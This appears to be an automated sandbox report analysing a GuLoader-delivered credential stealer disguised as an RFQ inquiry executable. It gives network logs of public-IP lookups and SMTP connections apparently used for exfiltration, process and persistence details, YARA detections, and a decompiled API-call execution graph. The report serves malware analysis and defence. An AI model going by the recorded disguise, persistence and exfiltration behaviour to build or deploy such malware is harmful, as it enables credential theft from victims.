                                                                  May 8, 2024 09:41:54.695264101 CEST1289INData Raw: c6 9d b0 6e 5d 7b 34 c7 87 bc a4 66 e2 3f ae fc f9 a9 ef ee cd 2c 57 49 54 55 7c f6 b6 31 d2 1c e4 18 e1 fb 88 bf 92 ab 01 02 b5 e7 c7 ae 5a f0 7a c3 65 12 f2 b9 91 64 bb 92 bf 62 f8 3d 27 24 36 8c c0 b0 6e f4 ba bc 52 c7 41 30 1f 94 a9 c0 14 6e
                                                                  Data Ascii: n]{4f?,WITU|1Zzedb='$6nRA0nqsI/uh~&,)0\JY03d(~25ZbDvBE#tfcbJSFWwAL1S?PsU2c?1dgR:C7M9>|>
                                                                  May 8, 2024 09:41:54.695319891 CEST1289INData Raw: c5 95 29 86 02 1b 33 16 52 3d 70 45 06 b7 87 51 14 11 2d a2 be ed 99 0f 57 22 53 46 f6 6b c1 21 8e 7e d3 4d dd 94 ef 85 fb 36 1a 1a 4c cd 2a 71 02 1f c2 22 29 52 6d 82 70 11 24 22 99 cb 84 58 d0 20 88 0f 68 b2 5d 26 53 8d 5f de d7 41 b4 10 3f a7
                                                                  Data Ascii: )3R=pEQ-W"SFk!~M6L*q")Rmp$"X h]&S_A?Edv_4EC:2((^JLt(eqt[KDIJ<'Rk=3Z3d#H+\QNbdr-s},i& 0%@280:w[H
                                                                  May 8, 2024 09:41:54.695389986 CEST1289INData Raw: 8b 6c 24 18 ea 96 68 c9 7f 9d 34 67 30 15 d4 8c a7 64 d1 9e 84 e2 82 95 e2 78 37 ff 89 aa b6 28 e0 bb a4 6a b6 97 d9 72 d6 8d 52 f6 18 3f 61 a2 a8 99 94 42 d9 0d 10 82 9f b9 63 42 26 67 f9 21 c6 39 f6 5b 9f 52 0f b1 81 09 58 58 27 41 3e cd ff d3
                                                                  Data Ascii: l$h4g0dx7(jrR?aBcB&g!9[RXX'A>:HT,kC'ZLf(]I@'pA$UFe\>O:d2I;Q[O'8-jHgXa_szEC<ZLgHUU!_g_


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.11.2051325208.95.112.1804944C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  May 8, 2024 09:41:57.285686970 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  May 8, 2024 09:41:57.386409044 CEST175INHTTP/1.1 200 OK
                                                                  Date: Wed, 08 May 2024 07:41:56 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 16
                                                                  X-Rl: 43
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.11.2051317172.67.74.1524431456C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-05-08 07:41:13 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-05-08 07:41:13 UTC211INHTTP/1.1 200 OK
                                                                  Date: Wed, 08 May 2024 07:41:13 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 8807ce60eeb2208d-IAD
                                                                  2024-05-08 07:41:13 UTC12INData Raw: 31 35 34 2e 31 36 2e 34 39 2e 34 31
                                                                  Data Ascii: 154.16.49.41


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.11.2051324172.67.74.1524434944C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-05-08 07:41:56 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-05-08 07:41:57 UTC211INHTTP/1.1 200 OK
                                                                  Date: Wed, 08 May 2024 07:41:57 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 8807cf6ef9177fae-IAD
                                                                  2024-05-08 07:41:57 UTC12INData Raw: 31 35 34 2e 31 36 2e 34 39 2e 34 31
                                                                  Data Ascii: 154.16.49.41


                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  May 8, 2024 09:41:17.695863962 CEST58751320185.230.214.164192.168.11.20220 mx.zoho.eu SMTP Server ready May 8, 2024 9:41:17 AM CEST
                                                                  May 8, 2024 09:41:17.697699070 CEST51320587192.168.11.20185.230.214.164EHLO 830021
                                                                  May 8, 2024 09:41:18.012525082 CEST58751320185.230.214.164192.168.11.20250-mx.zoho.eu Hello 830021 (154.16.49.41 (154.16.49.41))
                                                                  May 8, 2024 09:41:18.012547016 CEST58751320185.230.214.164192.168.11.20250-STARTTLS
                                                                  May 8, 2024 09:41:18.012556076 CEST58751320185.230.214.164192.168.11.20250 SIZE 53477376
                                                                  May 8, 2024 09:41:18.012883902 CEST51320587192.168.11.20185.230.214.164STARTTLS
                                                                  May 8, 2024 09:41:18.195270061 CEST58751320185.230.214.164192.168.11.20220 Ready to start TLS.
                                                                  May 8, 2024 09:42:00.323626041 CEST58751326185.230.214.164192.168.11.20220 mx.zoho.eu SMTP Server ready May 8, 2024 9:42:00 AM CEST
                                                                  May 8, 2024 09:42:00.324112892 CEST51326587192.168.11.20185.230.214.164EHLO 830021
                                                                  May 8, 2024 09:42:00.506979942 CEST58751326185.230.214.164192.168.11.20250-mx.zoho.eu Hello 830021 (154.16.49.41 (154.16.49.41))
                                                                  May 8, 2024 09:42:00.507105112 CEST58751326185.230.214.164192.168.11.20250-STARTTLS
                                                                  May 8, 2024 09:42:00.507121086 CEST58751326185.230.214.164192.168.11.20250 SIZE 53477376
                                                                  May 8, 2024 09:42:00.507529974 CEST51326587192.168.11.20185.230.214.164STARTTLS
                                                                  May 8, 2024 09:42:00.690093040 CEST58751326185.230.214.164192.168.11.20220 Ready to start TLS.

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:09:40:36
                                                                  Start date:08/05/2024
                                                                  Path:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"
                                                                  Imagebase:0x400000
                                                                  File size:389'472 bytes
                                                                  MD5 hash:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.106940804985.0000000009E6B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:09:40:52
                                                                  Start date:08/05/2024
                                                                  Path:C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"
                                                                  Imagebase:0x400000
                                                                  File size:389'472 bytes
                                                                  MD5 hash:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.111728526533.0000000037C14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:09:41:24
                                                                  Start date:08/05/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                  Imagebase:0x400000
                                                                  File size:389'472 bytes
                                                                  MD5 hash:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.107397454848.0000000009E7B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 18%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:09:41:39
                                                                  Start date:08/05/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                  Imagebase:0x400000
                                                                  File size:389'472 bytes
                                                                  MD5 hash:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.111729282817.0000000037E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:6
                                                                  Start time:09:41:40
                                                                  Start date:08/05/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                  Imagebase:0x400000
                                                                  File size:389'472 bytes
                                                                  MD5 hash:C35A5008193E77C7AFDF53D7FCC20F37
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:09:41:43
                                                                  Start date:08/05/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1156
                                                                  Imagebase:0x700000
                                                                  File size:482'640 bytes
                                                                  MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:20.1%
                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                    Signature Coverage:19.5%
                                                                    Total number of Nodes:1513
                                                                    Total number of Limit Nodes:45
                                                                    execution_graph 5054 10001000 5057 1000101b 5054->5057 5064 10001516 5057->5064 5059 10001020 5060 10001024 5059->5060 5061 10001027 GlobalAlloc 5059->5061 5062 1000153d 3 API calls 5060->5062 5061->5060 5063 10001019 5062->5063 5066 1000151c 5064->5066 5065 10001522 5065->5059 5066->5065 5067 1000152e GlobalFree 5066->5067 5067->5059 5068 402840 5069 402bbf 18 API calls 5068->5069 5071 40284e 5069->5071 5070 402864 5073 405bca 2 API calls 5070->5073 5071->5070 5072 402bbf 18 API calls 5071->5072 5072->5070 5074 40286a 5073->5074 5096 405bef GetFileAttributesW CreateFileW 5074->5096 5076 402877 5077 402883 GlobalAlloc 5076->5077 5078 40291a 5076->5078 5081 402911 CloseHandle 5077->5081 5082 40289c 5077->5082 5079 402922 DeleteFileW 5078->5079 5080 402935 5078->5080 5079->5080 5081->5078 5097 403222 SetFilePointer 5082->5097 5084 4028a2 5085 40320c ReadFile 5084->5085 5086 4028ab GlobalAlloc 5085->5086 5087 4028bb 5086->5087 5088 4028ef 5086->5088 5089 403027 36 API calls 5087->5089 5090 405ca1 WriteFile 5088->5090 5095 4028c8 5089->5095 5091 4028fb GlobalFree 5090->5091 5092 403027 36 API calls 5091->5092 5093 40290e 5092->5093 5093->5081 5094 4028e6 GlobalFree 5094->5088 5095->5094 5096->5076 5097->5084 5098 401cc0 5099 402ba2 18 API calls 5098->5099 5100 401cc7 5099->5100 5101 402ba2 18 API calls 5100->5101 5102 401ccf GetDlgItem 5101->5102 5103 402531 5102->5103 5103->5103 5104 4029c0 5105 402ba2 18 API calls 5104->5105 5106 4029c6 5105->5106 5107 4029f9 5106->5107 5108 40281e 5106->5108 5110 4029d4 5106->5110 5107->5108 5109 40603c 18 API calls 5107->5109 5109->5108 5110->5108 5112 405f61 wsprintfW 5110->5112 5112->5108 4015 401fc3 4016 401fd5 4015->4016 4026 402087 4015->4026 4038 402bbf 4016->4038 4019 401423 25 API calls 4024 4021e1 4019->4024 4020 402bbf 18 API calls 4021 401fe5 4020->4021 4022 401ffb LoadLibraryExW 4021->4022 4023 401fed GetModuleHandleW 4021->4023 4025 40200c 4022->4025 4022->4026 4023->4022 4023->4025 4044 406463 WideCharToMultiByte 4025->4044 4026->4019 4029 402056 4092 405179 4029->4092 4030 40201d 4032 402025 4030->4032 4033 40203c 4030->4033 4089 401423 4032->4089 4047 10001759 4033->4047 4034 40202d 4034->4024 4036 402079 FreeLibrary 4034->4036 4036->4024 4039 402bcb 4038->4039 4103 40603c 4039->4103 4042 401fdc 4042->4020 4045 40648d GetProcAddress 4044->4045 4046 402017 4044->4046 4045->4046 4046->4029 4046->4030 4048 10001789 4047->4048 4142 10001b18 4048->4142 4050 10001790 4051 100018a6 4050->4051 4052 100017a1 4050->4052 4053 100017a8 4050->4053 4051->4034 4191 10002286 4052->4191 4174 100022d0 4053->4174 4058 100017cd 4059 1000180c 4058->4059 4060 100017ee 4058->4060 4065 10001812 4059->4065 4066 1000184e 4059->4066 4204 100024a9 4060->4204 4061 100017d7 4061->4058 4201 10002b5f 4061->4201 4062 100017be 4064 100017c4 4062->4064 4068 100017cf 4062->4068 4064->4058 4185 100028a4 4064->4185 4070 100015b4 3 API calls 4065->4070 4072 100024a9 10 API calls 4066->4072 4067 100017f4 4215 100015b4 4067->4215 4195 10002645 4068->4195 4076 10001828 4070->4076 4073 10001840 4072->4073 4080 10001895 4073->4080 4226 1000246c 4073->4226 4079 100024a9 10 API calls 4076->4079 4078 100017d5 4078->4058 4079->4073 4080->4051 4084 1000189f GlobalFree 4080->4084 4084->4051 4086 10001881 4086->4080 4230 1000153d wsprintfW 4086->4230 4087 1000187a FreeLibrary 4087->4086 4090 405179 25 API calls 4089->4090 4091 401431 4090->4091 4091->4034 4093 405194 4092->4093 4102 405236 4092->4102 4094 4051b0 lstrlenW 4093->4094 4095 40603c 18 API calls 4093->4095 4096 4051d9 4094->4096 4097 4051be lstrlenW 4094->4097 4095->4094 4099 4051ec 4096->4099 4100 4051df SetWindowTextW 4096->4100 4098 4051d0 lstrcatW 4097->4098 4097->4102 4098->4096 4101 4051f2 SendMessageW SendMessageW SendMessageW 4099->4101 4099->4102 4100->4099 4101->4102 4102->4034 4104 406049 4103->4104 4105 406294 4104->4105 4108 4060fc GetVersion 4104->4108 4109 406262 lstrlenW 4104->4109 4112 40603c 10 API calls 4104->4112 4113 406177 GetSystemDirectoryW 4104->4113 4115 40618a GetWindowsDirectoryW 4104->4115 4116 4062ae 5 API calls 4104->4116 4117 406203 lstrcatW 4104->4117 4118 4061be SHGetSpecialFolderLocation 4104->4118 4119 40603c 10 API calls 4104->4119 4130 405ee7 RegOpenKeyExW 4104->4130 4135 405f61 wsprintfW 4104->4135 4136 40601a lstrcpynW 4104->4136 4106 402bec 4105->4106 4137 40601a lstrcpynW 4105->4137 4106->4042 4121 4062ae 4106->4121 4108->4104 4109->4104 4112->4109 4113->4104 4115->4104 4116->4104 4117->4104 4118->4104 4120 4061d6 SHGetPathFromIDListW CoTaskMemFree 4118->4120 4119->4104 4120->4104 4124 4062bb 4121->4124 4122 406331 4123 406336 CharPrevW 4122->4123 4126 406357 4122->4126 4123->4122 4124->4122 4125 406324 CharNextW 4124->4125 4128 406310 CharNextW 4124->4128 4129 40631f CharNextW 4124->4129 4138 4059fb 4124->4138 4125->4122 4125->4124 4126->4042 4128->4124 4129->4125 4131 405f5b 4130->4131 4132 405f1b RegQueryValueExW 4130->4132 4131->4104 4133 405f3c RegCloseKey 4132->4133 4133->4131 4135->4104 4136->4104 4137->4106 4139 405a01 4138->4139 4140 405a17 4139->4140 4141 405a08 CharNextW 4139->4141 4140->4124 4141->4139 4233 1000121b GlobalAlloc 4142->4233 4144 10001b3c 4234 1000121b GlobalAlloc 4144->4234 4146 10001d7a GlobalFree GlobalFree GlobalFree 4147 10001d97 4146->4147 4164 10001de1 4146->4164 4148 100020ee 4147->4148 4156 10001dac 4147->4156 4147->4164 4150 10002110 GetModuleHandleW 4148->4150 4148->4164 4149 10001c1d GlobalAlloc 4166 10001b47 4149->4166 4152 10002121 LoadLibraryW 4150->4152 4153 10002136 4150->4153 4151 10001c86 GlobalFree 4151->4166 4152->4153 4152->4164 4241 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4153->4241 4154 10001c68 lstrcpyW 4157 10001c72 lstrcpyW 4154->4157 4156->4164 4237 1000122c 4156->4237 4157->4166 4158 10002188 4159 10002195 lstrlenW 4158->4159 4158->4164 4242 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4159->4242 4162 10002048 4162->4164 4168 10002090 lstrcpyW 4162->4168 4164->4050 4165 10002148 4165->4158 4173 10002172 GetProcAddress 4165->4173 4166->4146 4166->4149 4166->4151 4166->4154 4166->4157 4166->4162 4166->4164 4169 10001cc4 4166->4169 4170 10001f37 GlobalFree 4166->4170 4172 1000122c 2 API calls 4166->4172 4240 1000121b GlobalAlloc 4166->4240 4167 100021af 4167->4164 4168->4164 4169->4166 4235 1000158f GlobalSize GlobalAlloc 4169->4235 4170->4166 4172->4166 4173->4158 4182 100022e8 4174->4182 4176 10002415 GlobalFree 4177 100017ae 4176->4177 4176->4182 4177->4058 4177->4061 4177->4062 4178 100023d3 lstrlenW 4178->4176 4184 100023de 4178->4184 4179 100023ba GlobalAlloc CLSIDFromString 4179->4176 4180 1000238f GlobalAlloc WideCharToMultiByte 4180->4176 4181 1000122c GlobalAlloc lstrcpynW 4181->4182 4182->4176 4182->4178 4182->4179 4182->4180 4182->4181 4244 100012ba 4182->4244 4184->4176 4248 100025d9 4184->4248 4186 100028b6 4185->4186 4187 1000295b EnumWindows 4186->4187 4188 10002979 4187->4188 4189 10002a75 4188->4189 4190 10002a6a GetLastError 4188->4190 4189->4058 4190->4189 4192 10002296 4191->4192 4193 100017a7 4191->4193 4192->4193 4194 100022a8 GlobalAlloc 4192->4194 4193->4053 4194->4192 4199 10002661 4195->4199 4196 100026b2 GlobalAlloc 4200 100026d4 4196->4200 4197 100026c5 4198 100026ca GlobalSize 4197->4198 4197->4200 4198->4200 4199->4196 4199->4197 4200->4078 4202 10002b6a 4201->4202 4203 10002baa GlobalFree 4202->4203 4251 1000121b GlobalAlloc 4204->4251 4206 10002530 StringFromGUID2 4209 100024b3 4206->4209 4207 10002541 lstrcpynW 4207->4209 4208 1000250b MultiByteToWideChar 4208->4209 4209->4206 4209->4207 4209->4208 4210 10002554 wsprintfW 4209->4210 4211 10002571 GlobalFree 4209->4211 4212 100025ac GlobalFree 4209->4212 4213 10001272 2 API calls 4209->4213 4252 100012e1 4209->4252 4210->4209 4211->4209 4212->4067 4213->4209 4256 1000121b GlobalAlloc 4215->4256 4217 100015ba 4218 100015c7 lstrcpyW 4217->4218 4220 100015e1 4217->4220 4221 100015fb 4218->4221 4220->4221 4222 100015e6 wsprintfW 4220->4222 4223 10001272 4221->4223 4222->4221 4224 100012b5 GlobalFree 4223->4224 4225 1000127b GlobalAlloc lstrcpynW 4223->4225 4224->4073 4225->4224 4227 10001861 4226->4227 4228 1000247a 4226->4228 4227->4086 4227->4087 4228->4227 4229 10002496 GlobalFree 4228->4229 4229->4228 4231 10001272 2 API calls 4230->4231 4232 1000155e 4231->4232 4232->4080 4233->4144 4234->4166 4236 100015ad 4235->4236 4236->4169 4243 1000121b GlobalAlloc 4237->4243 4239 1000123b lstrcpynW 4239->4164 4240->4166 4241->4165 4242->4167 4243->4239 4245 100012c1 4244->4245 4246 1000122c 2 API calls 4245->4246 4247 100012df 4246->4247 4247->4182 4249 100025e7 VirtualAlloc 4248->4249 4250 1000263d 4248->4250 4249->4250 4250->4184 4251->4209 4253 100012ea 4252->4253 4254 1000130c 4252->4254 4253->4254 4255 100012f0 lstrcpyW 4253->4255 4254->4209 4255->4254 4256->4217 5113 4016c4 5114 402bbf 18 API calls 5113->5114 5115 4016ca GetFullPathNameW 5114->5115 5116 4016e4 5115->5116 5122 401706 5115->5122 5119 40635d 2 API calls 5116->5119 5116->5122 5117 40171b GetShortPathNameW 5118 402a4c 5117->5118 5120 4016f6 5119->5120 5120->5122 5123 40601a lstrcpynW 5120->5123 5122->5117 5122->5118 5123->5122 4884 4014cb 4885 405179 25 API calls 4884->4885 4886 4014d2 4885->4886 5131 40194e 5132 402bbf 18 API calls 5131->5132 5133 401955 lstrlenW 5132->5133 5134 402531 5133->5134 5135 4027ce 5136 4027d6 5135->5136 5137 4027da FindNextFileW 5136->5137 5139 4027ec 5136->5139 5138 402833 5137->5138 5137->5139 5141 40601a lstrcpynW 5138->5141 5141->5139 5142 4048cf 5143 4048fb 5142->5143 5144 4048df 5142->5144 5146 404901 SHGetPathFromIDListW 5143->5146 5147 40492e 5143->5147 5153 405743 GetDlgItemTextW 5144->5153 5149 404911 5146->5149 5150 404918 SendMessageW 5146->5150 5148 4048ec SendMessageW 5148->5143 5151 40140b MulDiv 5149->5151 5150->5147 5151->5150 5153->5148 4887 401754 4888 402bbf 18 API calls 4887->4888 4889 40175b 4888->4889 4890 405c1e 2 API calls 4889->4890 4891 401762 4890->4891 4892 405c1e 2 API calls 4891->4892 4892->4891 5161 401d56 GetDC GetDeviceCaps 5162 402ba2 18 API calls 5161->5162 5163 401d74 MulDiv ReleaseDC 5162->5163 5164 402ba2 18 API calls 5163->5164 5165 401d93 5164->5165 5166 40603c 18 API calls 5165->5166 5167 401dcc CreateFontIndirectW 5166->5167 5168 402531 5167->5168 4916 4014d7 4917 402ba2 18 API calls 4916->4917 4918 4014dd Sleep 4917->4918 4920 402a4c 4918->4920 5169 401a57 5170 402ba2 18 API calls 5169->5170 5171 401a5d 5170->5171 5172 402ba2 18 API calls 5171->5172 5173 401a05 5172->5173 5174 40155b 5175 4029f2 5174->5175 5178 405f61 wsprintfW 5175->5178 5177 4029f7 5178->5177 5006 401ddc 5007 402ba2 18 API calls 5006->5007 5008 401de2 5007->5008 5009 402ba2 18 API calls 5008->5009 5010 401deb 5009->5010 5011 401df2 ShowWindow 5010->5011 5012 401dfd EnableWindow 5010->5012 5013 402a4c 5011->5013 5012->5013 5047 4022df 5048 402bbf 18 API calls 5047->5048 5049 4022ee 5048->5049 5050 402bbf 18 API calls 5049->5050 5051 4022f7 5050->5051 5052 402bbf 18 API calls 5051->5052 5053 402301 GetPrivateProfileStringW 5052->5053 5179 401bdf 5180 402ba2 18 API calls 5179->5180 5181 401be6 5180->5181 5182 402ba2 18 API calls 5181->5182 5183 401bf0 5182->5183 5184 401c00 5183->5184 5185 402bbf 18 API calls 5183->5185 5186 401c10 5184->5186 5187 402bbf 18 API calls 5184->5187 5185->5184 5188 401c1b 5186->5188 5189 401c5f 5186->5189 5187->5186 5191 402ba2 18 API calls 5188->5191 5190 402bbf 18 API calls 5189->5190 5192 401c64 5190->5192 5193 401c20 5191->5193 5195 402bbf 18 API calls 5192->5195 5194 402ba2 18 API calls 5193->5194 5196 401c29 5194->5196 5197 401c6d FindWindowExW 5195->5197 5198 401c31 SendMessageTimeoutW 5196->5198 5199 401c4f 5196->5199 5197->5199 5198->5199 5200 401960 5201 402ba2 18 API calls 5200->5201 5202 401967 5201->5202 5203 402ba2 18 API calls 5202->5203 5204 401971 5203->5204 5205 402bbf 18 API calls 5204->5205 5206 40197a 5205->5206 5207 40198e lstrlenW 5206->5207 5209 4019ca 5206->5209 5208 401998 5207->5208 5208->5209 5213 40601a lstrcpynW 5208->5213 5211 4019b3 5211->5209 5212 4019c0 lstrlenW 5211->5212 5212->5209 5213->5211 5214 401662 5215 402bbf 18 API calls 5214->5215 5216 401668 5215->5216 5217 40635d 2 API calls 5216->5217 5218 40166e 5217->5218 5219 4066e2 5225 406566 5219->5225 5220 406ed1 5221 4065f0 GlobalAlloc 5221->5220 5221->5225 5222 4065e7 GlobalFree 5222->5221 5223 406667 GlobalAlloc 5223->5220 5223->5225 5224 40665e GlobalFree 5224->5223 5225->5220 5225->5221 5225->5222 5225->5223 5225->5224 5226 4019e4 5227 402bbf 18 API calls 5226->5227 5228 4019eb 5227->5228 5229 402bbf 18 API calls 5228->5229 5230 4019f4 5229->5230 5231 4019fb lstrcmpiW 5230->5231 5232 401a0d lstrcmpW 5230->5232 5233 401a01 5231->5233 5232->5233 4257 4025e5 4271 402ba2 4257->4271 4259 4025f4 4260 40263a ReadFile 4259->4260 4262 4026d3 4259->4262 4263 40267a MultiByteToWideChar 4259->4263 4264 40272f 4259->4264 4267 4026a0 SetFilePointer MultiByteToWideChar 4259->4267 4268 402740 4259->4268 4270 40272d 4259->4270 4283 405c72 ReadFile 4259->4283 4260->4259 4260->4270 4262->4259 4262->4270 4274 405cd0 SetFilePointer 4262->4274 4263->4259 4285 405f61 wsprintfW 4264->4285 4267->4259 4269 402761 SetFilePointer 4268->4269 4268->4270 4269->4270 4272 40603c 18 API calls 4271->4272 4273 402bb6 4272->4273 4273->4259 4275 405cec 4274->4275 4277 405d08 4274->4277 4276 405c72 ReadFile 4275->4276 4278 405cf8 4276->4278 4277->4262 4278->4277 4279 405d11 SetFilePointer 4278->4279 4280 405d39 SetFilePointer 4278->4280 4279->4280 4281 405d1c 4279->4281 4280->4277 4286 405ca1 WriteFile 4281->4286 4284 405c90 4283->4284 4284->4259 4285->4270 4287 405cbf 4286->4287 4287->4277 5234 401e66 5235 402bbf 18 API calls 5234->5235 5236 401e6c 5235->5236 5237 405179 25 API calls 5236->5237 5238 401e76 5237->5238 5239 4056fa 2 API calls 5238->5239 5240 401e7c 5239->5240 5241 401edb CloseHandle 5240->5241 5242 401e8c WaitForSingleObject 5240->5242 5244 40281e 5240->5244 5241->5244 5243 401e9e 5242->5243 5245 401eb0 GetExitCodeProcess 5243->5245 5246 406430 2 API calls 5243->5246 5247 401ec2 5245->5247 5250 401ecd 5245->5250 5248 401ea5 WaitForSingleObject 5246->5248 5251 405f61 wsprintfW 5247->5251 5248->5243 5250->5241 5251->5250 4381 401767 4382 402bbf 18 API calls 4381->4382 4383 40176e 4382->4383 4384 401796 4383->4384 4385 40178e 4383->4385 4443 40601a lstrcpynW 4384->4443 4442 40601a lstrcpynW 4385->4442 4388 401794 4392 4062ae 5 API calls 4388->4392 4389 4017a1 4444 4059ce lstrlenW CharPrevW 4389->4444 4418 4017b3 4392->4418 4393 4017ef 4450 405bca GetFileAttributesW 4393->4450 4397 4017c5 CompareFileTime 4397->4418 4398 401885 4400 405179 25 API calls 4398->4400 4399 40185c 4401 405179 25 API calls 4399->4401 4409 401871 4399->4409 4403 40188f 4400->4403 4401->4409 4402 40601a lstrcpynW 4402->4418 4421 403027 4403->4421 4406 4018b6 SetFileTime 4407 4018c8 FindCloseChangeNotification 4406->4407 4407->4409 4410 4018d9 4407->4410 4408 40603c 18 API calls 4408->4418 4411 4018f1 4410->4411 4412 4018de 4410->4412 4414 40603c 18 API calls 4411->4414 4413 40603c 18 API calls 4412->4413 4416 4018e6 lstrcatW 4413->4416 4417 4018f9 4414->4417 4416->4417 4419 40575f MessageBoxIndirectW 4417->4419 4418->4393 4418->4397 4418->4398 4418->4399 4418->4402 4418->4408 4420 405bef GetFileAttributesW CreateFileW 4418->4420 4447 40635d FindFirstFileW 4418->4447 4453 40575f 4418->4453 4419->4409 4420->4418 4423 403040 4421->4423 4422 40306b 4457 40320c 4422->4457 4423->4422 4467 403222 SetFilePointer 4423->4467 4427 403088 GetTickCount 4438 40309b 4427->4438 4428 4031ac 4429 4031b0 4428->4429 4433 4031c8 4428->4433 4431 40320c ReadFile 4429->4431 4430 4018a2 4430->4406 4430->4407 4431->4430 4432 40320c ReadFile 4432->4433 4433->4430 4433->4432 4435 405ca1 WriteFile 4433->4435 4434 40320c ReadFile 4434->4438 4435->4433 4437 403101 GetTickCount 4437->4438 4438->4430 4438->4434 4438->4437 4439 40312a MulDiv wsprintfW 4438->4439 4441 405ca1 WriteFile 4438->4441 4460 406533 4438->4460 4440 405179 25 API calls 4439->4440 4440->4438 4441->4438 4442->4388 4443->4389 4445 4017a7 lstrcatW 4444->4445 4446 4059ea lstrcatW 4444->4446 4445->4388 4446->4445 4448 406373 FindClose 4447->4448 4449 40637e 4447->4449 4448->4449 4449->4418 4451 405be9 4450->4451 4452 405bdc SetFileAttributesW 4450->4452 4451->4418 